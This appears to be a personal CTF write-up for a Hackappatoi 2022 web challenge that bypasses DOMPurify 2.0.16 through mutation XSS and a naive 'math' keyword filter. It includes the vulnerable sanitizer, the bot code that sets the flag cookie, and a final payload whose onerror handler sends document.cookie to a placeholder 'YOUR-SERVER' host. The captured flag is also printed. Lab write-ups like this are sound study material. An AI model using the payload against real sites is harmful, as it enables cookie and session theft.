Vulnerable to MXSS and tries to filter the word **math**, vulnerable code: ```javascript function secureQuery(string) { // let's do this real quick, friends are waiting me at the Drunken Bathrobe const reg = /math/gi; // nobody likes math let res = string.replaceAll(reg, ""); res = DOMPurify.sanitize(res); return res; } ``` It then runs through Dompurify. Inside the Dockerfile: ```bash RUN npm i ejs @fastify/view @fastify/formbody @fastify/static [email protected] jsdom ``` Dompuriy 2.0.16 is vulnerable, change from v2.0.16 -> v2.0.17 ``` "title": "Tests against nesting-based mXSS behavior 2/2", "payload": "<math><mtext><table><mglyph><style><math>CLICKME</math>", ``` MXSS Reading, specifically Dompurify - - Tools to test - Code for the backend check ```javascript const cookies = [ { name: "flag", value: process.env.FLAG, }, ]; async function checkReport(query) { const browser = await puppeteer.launch(browser_options); try { const page = await browser.newPage(); const urlToVisit = "" + query; console.log("URL to visit:", urlToVisit); await page.goto(""); await page.setCookie(...cookies); await page.goto(urlToVisit, { waitUntil: "networkidle0", timeout: 10000, }); await browser.close(); } catch { await browser.close(); } } ``` Final payload that evades the **math** filter and executes a callback to our server with the flag ```payload-final <maMATHth><mtext><table><mglyph><style><maMATHth><img src=x onerror=document.location='http://YOUR-SERVER/?c='%2bdocument.cookie;></mMATHath> ``` ![[Pasted image 20221211011536.png]] Flag: ```flag hctf{my_n3w_flag-fl4vor3d_c0ck7ail} ``` --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #hackappatoi2022 #xss #mxss #dompurify #web Related: